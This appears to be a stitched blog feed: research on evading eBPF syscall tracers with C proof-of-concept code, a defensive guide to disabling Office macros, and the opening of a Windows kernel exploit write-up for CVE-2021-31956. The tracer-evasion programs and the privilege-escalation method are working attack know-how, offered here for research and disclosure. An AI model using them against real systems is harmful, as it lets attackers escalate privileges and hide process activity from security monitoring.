111506.077553  0      double-fork      0       0       50590            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
111506.079220  0      double-fork      0       0       50592            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
...
111506.142778  0      double-fork      0       0       50690            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0
111506.143236  0      double-fork      0       0       0                execve               pathname: /usr/bin/id, argv: [/usr/bin/id]
...
111514.289461  0      bash             0       0       50699            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F56929630BF, tls: 0
111514.293312  0      bash             0       0       0                execve               pathname: ./double-fork, argv: [./double-fork 100 /usr/bin/id]
111514.303955  0      double-fork      0       0       50700            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
111514.304240  0      double-fork      0       0       50701            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
...
111514.356522  0      double-fork      0       0       50799            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0
111514.356949  0      double-fork      0       0       0                execve               pathname: /usr/bin/id, argv: [/usr/bin/id]
...
111519.410500  0      double-fork      0       0       50836            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F533D0A10BF, tls: 0
111519.411117  0      double-fork      0       0       50837            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F533D0A10BF, tls: 0

The start of child execution is triggered from the wake_up_new_task() function called by _do_fork() (now kernel_clone()), which is the internal kernel function powering all of the fork(2)/clone(2) alikes.

pid_t kernel_clone(struct kernel_clone_args *args)
{
  ...
  /*
   * Do this prior waking up the new thread - the thread pointer
   * might get invalid after that point, if the thread exits quickly.
   */
  trace_sched_process_fork(current, p);

  pid = get_task_pid(p, PIDTYPE_PID);
  nr = pid_vnr(pid);

  if (clone_flags & CLONE_PARENT_SETTID)
    put_user(nr, args->parent_tid);

  if (clone_flags & CLONE_VFORK) {
    p->vfork_done = &vfork;
    init_completion(&vfork);
    get_task_struct(p);
  }

  wake_up_new_task(p);
  ...

In our talk (slides 24-25), we gave a bpftrace example of a fork-exec tracer that would not lose to race conditions.

kprobe:wake_up_new_task {
  $chld_pid= ((structtask_struct*)arg0)->pid;
  @pids[$chld_pid]= nsecs;
}

tracepoint:syscalls:sys_enter_execve {
  if (@pids[pid]){
    $time_diff= (([email protected][pid]) / 1000000);
    if($time_diff<= 10){
      printf("%s => ",comm);
      join(args->argv);
    }
  }
  delete(@pids[pid]);
}

In general, we prefer to hook wake_up_new_task() with a kprobe since it’s fairly stable and gives raw access to the entire fully-configured child struct task_struct* right before it is started. However, if one does not care about other metadata accessible from that pointer, nor need it to be fully initialized (i.e. if they just want the PID), they can hook the sched_process_fork tracepoint event, which is triggered by the trace_sched_process_fork(current, p) call shown above. This is what tracee currently opts to do as of commit 8c944cf07f15045f395f7754f92b7809316c681c/tag v0.5.4.

Additionally, the problems of tracing the fork(2)/clone(2)/etc. syscalls directly led to (and lead to in any tracers not hooking wake_up_new_task/sched_process_fork) other issues that can present bypasses in the scenario of live child process observation.

PID Namespaces

The most interesting of these issues is that fork(2)/clone(2)/etc. return PIDs within the context of the PID namespace of the process (thread). As a result, the return values of these syscalls cannot meaningfully be used by a kernel-level tracer without also accounting for child pidns PID to host PID mappings. In distros that allow unprivileged user namespaces to be created, this allows arbitrary process to create nested PID namespaces by first creating a nested user namespace. This can be done in a number of ways, such as via unshare(2), setns(2), or even clone(2) with CLONE_NEWUSER and CLONE_NEWPID.

[email protected]:~# su -s /bin/bash nobody
[email protected]:/root$ unshare -Urpf --mount-proc
[email protected]:/root# nano &
[1] 18
[email protected]:/root# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.1  0.0   8264  5156 pts/0    S    01:37   0:00 -bash
root          17  0.0  0.0   7108  4132 pts/0    T    01:38   0:00 nano
root          18  0.0  0.0   8892  3344 pts/0    R+   01:38   0:00 ps aux
[email protected]:/root# unshare -pf --mount-proc
[email protected]:/root# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  1.2  0.0   8264  5200 pts/0    S    01:38   0:00 -bash
root          15  0.0  0.0   8892  3332 pts/0    R+   01:38   0:00 ps aux
// $ gcc -std=c11 -Wall -Wextra -pedantic -o userns-clone-fork userns-clone-fork.c
// $ ./userns-clone-fork </path/to/binary>

#define _GNU_SOURCE
#include <sched.h>

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int clone_child(void *arg) {
  char** argv = (char**)arg;

  printf("clone pid: %u\n", getpid());

  pid_t p = fork();
  if (p != 0) {
    return 0;
  }

  printf("fork pid: %u\n", getpid());

  return execve(argv[1], &argv[1], NULL);
}

static char stack[1024*1024];

int main(int argc, char **argv) {
  if (argc < 2) {
    return 1;
  }

  printf("parent pid: %u\n", getpid());

  pid_t p = clone(clone_child, &stack[sizeof(stack)], CLONE_NEWUSER|CLONE_NEWPID, argv);
  if (p == -1) {
    perror("clone");
    exit(1);
  }

  return 0;
}
/tracee/dockerer/tracee.main/dist # ./tracee --trace process:follow --filter pid=54519 -e execve -e clone
TIME(s)        UID    COMM             PID     TID     RET              EVENT                ARGS
117174.563477  0      bash             0       0       55395            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F99617200BF, tls: 0
117174.566597  0      bash             0       0       0                execve               pathname: ./userns-clone-fork, argv: [./userns-clone-fork /usr/bin/id]
117174.578037  0      userns-clone-fo  0       0       55396            clone                flags: CLONE_NEWUSER|CLONE_NEWPID, stack: 0x5621B2DBB030, parent_tid: 0x0, child_tid: 0x7F7C130B6285, tls: 18
117174.579600  0      userns-clone-fo  0       0       2                clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F7C1307A0BF, tls: 0

However, more interestingly, this means that such tracers will not work by default on containers unless the containers run within the host PID namespace, a dangerous configuration. This was the behavior we observed with tracee prior to the aforementioned commit 8c944cf07f15045f395f7754f92b7809316c681c.

clone3(2) also Considered Harmful

Prior to tracee 0.5.4, fork(2)/clone(2)-alike syscall PID return value processing was handled with the following code:

SEC("raw_tracepoint/sys_exit")
int tracepoint__raw_syscalls__sys_exit(struct bpf_raw_tracepoint_args *ctx)
{
    long ret = ctx->args[1];
    struct task_struct *task = (struct task_struct *)bpf_get_current_task();
    struct pt_regs *regs = (struct pt_regs*)ctx->args[0];
    int id = READ_KERN(regs->orig_ax);

    ...

    // fork events may add new pids to the traced pids set
    // perform this check after should_trace() to only add forked childs of a traced parent
    if (id == SYS_CLONE || id == SYS_FORK || id == SYS_VFORK) {
        u32 pid = ret;
        bpf_map_update_elem(&traced_pids_map, &pid, &pid, BPF_ANY);
        if (get_config(CONFIG_NEW_PID_FILTER)) {
            bpf_map_update_elem(&new_pids_map, &pid, &pid, BPF_ANY);
        }
    }

In the above snippet, the syscall ID is compared against those of clone(2), fork(2), and vfork(2). However, the syscall is not compared against the ID of clone3(2). While tracee does separately log clone3(2) events (since commit f44eb206bf8e80efeb1da68641cb61f3f00c522c/tag v0.4.0), the above omission resulted in clone3(2)-created child process not being followed prior to commit 8c944cf07f15045f395f7754f92b7809316c681c.

// $ gcc -std=c11 -Wall -Wextra -pedantic -o clone3 clone3.c
// $ ./clone3 </path/to/binary>

#define _GNU_SOURCE
#include <sched.h>

#include <linux/sched.h>
#include <linux/types.h>

#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/syscall.h>

int clone_child(void *arg) {
  char** argv = (char**)arg;

  return execve(argv[1], &argv[1], NULL);
}

int main(int argc, char **argv) {
  if (argc < 2) {
    return 1;
  }

  printf("parent pid: %u\n", getpid());

  struct clone_args args = {0};
  pid_t p = syscall(__NR_clone3, &args, sizeof(struct clone_args));

  if (p == -1) {
    perror("clone3");
    return 1;
  }

  if (p != 0) {
    printf("clone pid: %u\n", p);
  } else {
    clone_child(argv);
  }

  return 0;
}

Since that commit, which introduces the change to use sched_process_fork, tracee now obtains both the host PID and in-namespace PID:

SEC("raw_tracepoint/sched_process_fork")
int tracepoint__sched__sched_process_fork(struct bpf_raw_tracepoint_args *ctx)
{
    // Note: we don't place should_trace() here so we can keep track of the cgroups in the system
    struct task_struct *parent = (struct task_struct*)ctx->args[0];
    struct task_struct *child = (struct task_struct*)ctx->args[1];

    int parent_pid = get_task_host_pid(parent);
    int child_pid = get_task_host_pid(child);

    ...

    if (event_chosen(SCHED_PROCESS_FORK) && should_trace()) {
       ... 
        int parent_ns_pid = get_task_ns_pid(parent);
        int child_ns_pid = get_task_ns_pid(child);

        save_to_submit_buf(submit_p, (void*)&parent_pid, sizeof(int), INT_T, DEC_ARG(0, *tags));
        save_to_submit_buf(submit_p, (void*)&parent_ns_pid, sizeof(int), INT_T, DEC_ARG(1, *tags));
        save_to_submit_buf(submit_p, (void*)&child_pid, sizeof(int), INT_T, DEC_ARG(2, *tags));
        save_to_submit_buf(submit_p, (void*)&child_ns_pid, sizeof(int), INT_T, DEC_ARG(3, *tags));

        events_perf_submit(ctx);
    }

    return 0;
}

TOCTTOU Issues Endemic to Lightweight Tracers

In our CCC talk23, we discussed how there exists a significant time-of-check-to-time-of-use (TOCTTOU) race condition when hooking a syscall entrypoint (e.g. via a kprobe, but also more generally) as userland-supplied data that is copied/processed by the hook may change by the time the kernel accesses as part of the syscall’s implementation.

The main way to get around this issue is to hook internal kernel functions, tracepoints, or LSM hooks to access syscall inputs after they have already been copied into kernel memory (and probe the in-kernel version). However, this approach is not universally applicable and only works in the presence of such internal anchor points. Instead, one has to rely on the Linux Auditing System (aka auditd), which, in addition to simple raw syscall argument dumps, has its calls directly interleaved within the kernel’s codebase to process and log inputs after they have been copied from user memory for processing by the kernel. auditd’s calls are very carefully (read: fragilely) placed to ensure that values used for filtering and logging are not subject to race conditions, even in the cases where data is being read from user memory.

auditd: The “d” Stands for Dancing

For example, auditd’s execve(2) logging takes the following form for a simple ls -lht /:

type=EXECVE msg=audit(...): argc=4 a0="ls" a1="--color=auto" a2="-lht" a3="/"

This log line is generated by audit_log_execve_info() from apparent userspace memory:

  const char __user *p = (const char __user *)current->mm->arg_start;
  ...
      len_tmp = strncpy_from_user(&buf_head[len_buf], p,
                                  len_max - len_buf);

However, we can observe that the execve(2) argument handling of auditd is “safe” with the following bpftrace script which hooks some of the functions called during an execve(2) syscall that have symbols:

kprobe:__audit_bprm { printf("__audit_bprm called\n"); }
kprobe:setup_arg_pages { printf("setup_arg_pages called\n") }
kprobe:do_open_execat { printf("do_open_execat called\n"); }
kprobe:open_exec { printf("open_exec(\"%s\") called\n", str(arg0)); }
kprobe:security_bprm_creds_for_exec { printf("security_bprm_creds_for_exec called\n"); }
# bpftrace trace.bt 
Attaching 5 probes...
do_open_execat called
security_bprm_creds_for_exec called
open_exec("/lib64/ld-linux-x86-64.so.2") called
do_open_execat called
setup_arg_pages called
__audit_bprm called

The first do_open_execat() call is that from bprm_execve(), which is called from do_execveat_common(), right after argv is copied into the struct linux_binprm. setup_arg_pages is called from within a struct linux_binfmt implementation and sets current->mm->arg_start to bprm->p. And then lastly, __audit_bprm() is called (from exec_binprm(), itself called from bprm_execve()), which sets the auditd context type to AUDIT_EXECVE, resulting in audit_log_execve_info() being called from audit_log_exit() (via show_special()) to generate the above type=EXECVE log line.

It goes without saying that this is not really something that eBPF code could hope to do in any sort of stable manner. One could try to use eBPF to hook a bunch of the auditd related functions in the kernel, but that probably isn’t very stable either and any such code would essentially need to re-implement just the useful parts of auditd that extract inputs, process state, and system state, and not the cruft (slow filters, string formatting, and who knows what else) that results in auditd somehow having a syscall overhead upwards of 245%.4

eBPF Doesn’t Like to Share

Instead of trying to hook onto __audit_* symbols called only when auditd is enabled, we should probably try to find relevant functions or tracepoints in the same context to latch onto, such as trace_sched_process_exec in the case of execve(2).

static int exec_binprm(struct linux_binprm *bprm)
{
  ...
  audit_bprm(bprm);
  trace_sched_process_exec(current, old_pid, bprm);
  ptrace_event(PTRACE_EVENT_EXEC, old_vpid);
  proc_exec_connector(current);
  return 0;
}

As it turns out, trace_sched_process_exec is even more necessary than one might initially think. While race conditions when hooking syscalls via kprobes and tracepoints are troublesome, it turns out that userspace can flat out block eBPF from reading syscall inputs if they reside in MAP_SHARED pages. It is worth noting that such tomfoolery is somewhat limited as it only works against bpf_probe_read(|_user|_kern) calls made before a page is read by the kernel in a given syscall handler. As a result, a quick “fix” for tracers is to perform such reads when the syscall returns. However, such a “fix” would increase the feasibility of race condition abuse whenever the syscall implementation takes longer than the syscall context switch.

Given that this limitation doesn’t appear to be that well known, it could be a bug in the kernel, but it only presents an issue when one is already writing their eBPF tracers in the wrong manner. tracee is not generally vulnerable to MAP_SHARED abuse because it mostly dumps syscall arguments from a raw tracepoint hook on sys_exit. However, for syscalls that don’t normally return, such as execve(2), it resorts to dumping the arguments in its sys_enter raw tracepoint hook, enabling the syscall event to be fooled. Regardless, this is also not an issue for tracee as it implements a hook for the sched_process_exec tracepoint as of commit 6166346e7479bc3b4b417a67a92a2493a30b949e/tag v0.6.0.

// $ gcc -std=c11 -Wall -Wextra -pedantic -o clobber clobber.c -lpthread

#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <pthread.h>

static char* checker;
static char* key;

static int mode = 1;

//force byte by byte copies
void yoloncpy(volatile char* dst, volatile char* src, size_t n, int r) {
  if (r == 0) {
    for (size_t i = 0; i < n; i++) {
      dst[i] = src[i];
    }
  } else {
    for (size_t i = n; i > 0; i--) {
      dst[i-1] = src[i-1];
    }
  }
}

void* thread1(void* arg) {
  int rev = (int)(uintptr_t)arg;
  uint64_t c = 0;
  while(1) {//c < 8192) {
    switch (c%2) {
      case 0: {
        yoloncpy(key, "supergood", 10, rev);
        break;
      }
      case 1: {
        yoloncpy(key, "reallybad", 10, rev);
        break;
      }
    }
    c += 1;
  }
  return NULL;
}

void* thread2(void* arg) {
  (void)arg;
  uint64_t c = 0;
  while(1) {
    switch (c%2) {
      case 0: {
        memcpy(key, "supergood", 10);
        break;
      }
      case 1: {
        memcpy(key, "reallybad", 10);
        break;
      }
    }
    c += 1;
  }
  return NULL;
}

int main(int argc, char** argv, char** envp) {

  if (argc < 2) {
    printf("usage: %s <count> [mode]\n", argv[0]);
    return 1;
  }

  int count = atoi(argv[1]);

  if (argc >= 3) {
    mode = atoi(argv[2]);
    if (mode != 1 && mode != 2) {
      printf("invalid mode: %s\n", argv[2]);
      return 1;
    }
  }

  key = mmap(NULL, 32, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (key == NULL) {
    perror("mmap");
    return 1;
  }
  checker = mmap(NULL, 32, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
  if (checker == NULL) {
    perror("mmap2");
    return 1;
  }

  strcpy(key, "supergood");
  strcpy(checker, "./checker");

  char count_str[32] = "0";

  char* nargv[] = {checker, key, count_str, NULL};

  pthread_t t_a;
  pthread_t t_b;
  if (mode == 1) {
    pthread_create(&t_a, NULL, &thread1, (void*)0);
    pthread_create(&t_b, NULL, &thread1, (void*)1);
  } else if (mode == 1) {
    pthread_create(&t_a, NULL, &thread2, NULL);
  }

  int c = 0;
  while(c < count) {
    snprintf(count_str, sizeof(count_str), "%d", c);

    int r = fork();
    if (r == 0) {
      int fd = open(key, 0);
      if (fd >= 0) {
        close(fd);
      }
      execve(checker, nargv, envp);
    } else {
      sleep(1);
    }
    c += 1;
  }
  return 0;
}
# ./dist/tracee-ebpf --trace event=execve,sched_process_exec
UID    COMM             PID     TID     RET              EVENT                ARGS
0      bash             7662    7662    0                execve               pathname: ./clobber, argv: [./clobber 5]
0      clobber          7662    7662    0                sched_process_exec   cmdpath: ./clobber, pathname: /root/clobber, argv: [./clobber 5], dev: 264241153, inode: 5391, invoked_from_kernel: 0
0      clobber          7665    7665    0                execve               argv: []
0      checker          7665    7665    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker rupergood 0], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0      clobber          7666    7666    0                execve               argv: []
0      checker          7666    7666    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker reallybad 1], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0      clobber          7667    7667    0                execve               argv: []
0      checker          7667    7667    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker supergood 2], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0      clobber          7668    7668    0                execve               argv: []
0      checker          7668    7668    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker supergbad 3], dev: 264241153, inode: 5393, invoked_from_kernel: 0
0      clobber          7669    7669    0                execve               argv: []
0      checker          7669    7669    0                sched_process_exec   cmdpath: ./checker, pathname: /root/checker, argv: [./checker reallgood 4], dev: 264241153, inode: 5393, invoked_from_kernel: 0

Note: Interestingly enough, I only stumbled across this behavior because it would have been less effective to use in-process threads to clobber inputs to execve(2) since it kills all other threads than the one issuing the syscall. The open() call above exists primarily to trigger an example for the below test code to show how probes from sys_enter fail (with error -14, bad address), but succeed in in the sys_exit hook.

SEC("raw_tracepoint/sys_enter")
int sys_enter_hook(struct bpf_raw_tracepoint_args *ctx) {
  struct pt_regs _regs;
  bpf_probe_read(&_regs, sizeof(_regs), (void*)ctx->args[0]);
  int id = _regs.orig_ax;
  char buf[128];
  if (id == 257) {
    char* const pathname = (char* const)_regs.si;
    bpf_printk("sys_enter -> openat %p\n", pathname);
    bpf_probe_read_str(buf, sizeof(buf), (void*)pathname);
    bpf_printk("sys_enter -> openat %s\n", buf);
  } else if (id == 59) {
    char* const f = (char* const)_regs.di;
    bpf_printk("sys_exit -> execve %p\n", f);
    bpf_probe_read_str(buf, sizeof(buf), (void*)f);
    bpf_printk("sys_exit -> execve %s\n", buf);
  }

  return 0;
}

SEC("raw_tracepoint/sys_exit")
int sys_exit_hook(struct bpf_raw_tracepoint_args *ctx) {
  struct pt_regs _regs;
  bpf_probe_read(&_regs, sizeof(_regs), (void*)ctx->args[0]);
  int id = _regs.orig_ax;
  char buf[128];
  if (id == 257) {
    char* const pathname = (char* const)_regs.si;
    bpf_printk("sys_exit -> openat %p\n", pathname);
    bpf_probe_read_str(buf, sizeof(buf), (void*)pathname);
    bpf_printk("sys_exit -> openat %s\n", buf);
  } else if (id == 59) {
    char* const f = (char* const)_regs.di;
    bpf_printk("sys_exit -> execve %p\n", f);
    bpf_probe_read_str(buf, sizeof(buf), (void*)f);
    bpf_printk("sys_exit -> execve %s\n", buf);
  }

  return 0;
}
# cat /sys/kernel/tracing/trace_pipe
...
<...>-215084  [000] .... 2266209.468617: 0: sys_enter -> openat 000000005ec00ae4
<...>-215084  [000] .N.. 2266209.468645: 0: sys_enter -> openat
<...>-215084  [000] .... 2266209.469091: 0: sys_exit -> openat 000000005ec00ae4
<...>-215084  [000] .N.. 2266209.469114: 0: sys_exit -> openat supelybad
<...>-215084  [000] .... 2266209.469199: 0: sys_exit -> execve 0000000031d15ade
<...>-215084  [000] .N.. 2266209.469222: 0: sys_exit -> execve
<...>-215084  [000] .... 2266209.470178: 0: sys_exit -> execve 0000000000000000
<...>-215084  [000] .N.. 2266209.470224: 0: sys_exit -> execve
<...>-215084  [000] .... 2266209.472093: 0: sys_enter -> openat 000000008edac6ac
<...>-215084  [000] .N.. 2266209.472138: 0: sys_enter -> openat /etc/ld.so.cache
<...>-215084  [000] .... 2266209.472205: 0: sys_exit -> openat 000000008edac6ac
<...>-215084  [000] .N.. 2266209.472248: 0: sys_exit -> openat /etc/ld.so.cache
<...>-215084  [000] .... 2266209.472345: 0: sys_enter -> openat 000000007671a9c9
<...>-215084  [000] .N.. 2266209.472366: 0: sys_enter -> openat /lib/x86_64-linux-gnu/libc.so.6
<...>-215084  [000] .... 2266209.472420: 0: sys_exit -> openat 000000007671a9c9
<...>-215084  [000] .N.. 2266209.472440: 0: sys_exit -> openat /lib/x86_64-linux-gnu/libc.so.6
...

Current Thoughts

If you want accurate tracing for syscall events, you probably shouldn’t be hooking the actual syscalls, and especially not the syscall tracepoints. Instead, your only real option is to figure out how to dump the arguments from the internals of a given syscall implementation. Depending on if there are proper hook-points (e.g. tracepoints, LSM hooks, etc.) or not — and if they provide access to all arguments — it may be necessary to hook internal kernel functions with kprobes for absolute correctness, if it is at all possible in the first place. For what it’s worth, this is mostly a problem with Linux itself and not something that kprobe-ing kernel modules can fix; though they can properly handle kernel structs beyond basic complexity, unlike eBPF.

In the case of security event auditing, correctness supersedes ease of development, but vendors may not be making that choice, at least not initially. Due to this, auditors must be aware of how their analysis tools actually work and how (and from where) they source event information, so that they can treat the output with a sizable hunk of salt where necessary because, while the tools are likely not lying, they may not be not capable of telling the truth either.


  1. Olsen, Andy. “Fast and Easy pTracing with eBPF (and not ptrace)” NCC Group Open Forum, NCC Group, September 2019, New York, NY. Presentation.↩

  2. Dileo, Jeff; Olsen, Andy. “Kernel Tracing With eBPF: Unlocking God Mode on Linux” 35th Chaos Communication Congress (35C3), Chaos Computer Club (CCC), 30 December 2018, Leipziger Messe, Leipzig, Germany. Conference Presentation.↩

  3. https://media.ccc.de/v/35c3-9532-kernel_tracing_with_ebpf↩

  4. https://capsule8.com/blog/auditd-what-is-the-linux-auditing-system/↩

Disabling Office Macros to Reduce Malware Infections

16 August 2021 at 17:38

Category:  Reduction/Prevention

Overview

Document macros have gone in and out of style since 1995 as a deployment method for malware. Netskope’s latest ‘Cloud and Threat Report: July 2021 Edition’ points out that in Q2 of 2021, Microsoft Office macros accounted for 43% of malicious Office document downloads, compared to just 20% at the beginning of 2020.  Malicious Office documents, aka maldocs, have continued to be an issue for organizations.  Emotet, a successful malware family taken down in 2020, heavily used Office macros to infect Microsoft Windows systems.  Other malware groups seemed to have taken a page from the Emotet playbook and increased the use of macros in their recent campaigns of 2021. Today let us take a look at the various methods of detection and prevention of malicious macros.

Enabled Macros by Default

Microsoft Office by default allows a user to enable content and allow macros to run when opening Office documents like Word, Excel, and even PowerPoint.  Macros or enabled content is rarely used by most users, and typically just a handful of users needing or using Excel financial calculations.  Most organizations are scared or uncertain about what will break if macros are disabled.  Creating a communication plan informing the organization about the upcoming change and providing a way for users to request and justify the need for macros, get any needed approvals, and required training can help avoid significant adverse impacts to the organization once implemented. 

Detection

Detecting the use of macros within Office programs is not easy as there are no logging events associated with macro usage. The only option is to look for programs executed after the launch of Office programs. Often malware will use the macro to launch a scripting engine such as cscript, wscript, or other scripting languages. Additionally, PowerShell, WMI, or other administrative Windows utilities have also been used in this context.  Endpoint Detection and Response solutions (EDR) usually monitor these parent-child relationships and trigger when Office documents attempt to execute nonstandard programs. Similarly, an organization with robust and proper logging of endpoint behavior can build detections within their log management or SIEM solution to highlight odd Office document executions.

Reduction/Prevention

The best and easiest option to reduce the likelihood of malicious Office documents crippling an organization with malware or ransomware is to disable Office macros and create an allow list for users that absolutely need macros or enabled content. Users with exceptions to run macros or enabled content should be a priority to monitor for maldoc behavior through suspicious parent-child Office executions.

Blocking all Office documents from coming into the organization is not feasible due to the widespread usage of Microsoft Office products. However, some email scanning gateways offer maldoc scanning at an additional cost and can effectively reduce the sheer quantity of malicious Office documents an organization receives.  Alternatively, implementing an EDR solution is also a viable option.

Disabling Office macros is the easiest as it is FREE and already built into Microsoft Active Directory as a Group Policy object. The image below depicts the setting to disable Office macros.

Organizations can utilize user groups for those exceptions that still require macro functionality. However, keep in mind that those specific users should be provided additional awareness training on the ramifications of opening malicious Office documents and enabling content.

Use the Registry to block macros

For those that do not have Active Directory, blocking macros can also be achieved by adding a registry setting to each system to disable macro usage. Set the following keys to achieve macro blocking and be sure to adjust the appropriate Office version, e.g., “15.0, 16.0, etc.”:

  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\office\<16.0>\word\security
  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\office\<16.0>\excel\security
  • HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\office\<16.0>\powerpoint\security

In each key listed above, create the following value:

  • DWORD: blockcontentexecutionfrominternet
    • Value = 1

Conclusion

We hope this blog entry helps provide an option to reduce the risk of infection from ever-increasing malicious Office documents and some things to consider when implementing the change.  With some preparation, communication, and education, an organization can reduce the likelihood of getting infected by maldocs with an existing FREE option available to all Windows users.

References and Additional Reading

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability CVE-2021-31955). This was also realised too by Yan ZiShuang and documented within the blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or pan a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 lead to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and{write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming is as follows:

The difficulty with this is that due to the low fragmentation heap (LFH) randomisation, it makes reliably achieving this memory layout more difficult and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absense of an LFH "Heap Randomisation" weakness or vulnerability, then this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which when added with the header 0x10 + the POOL_HEADER (0x10) we also end up with a chunk allocated of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of free’ing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
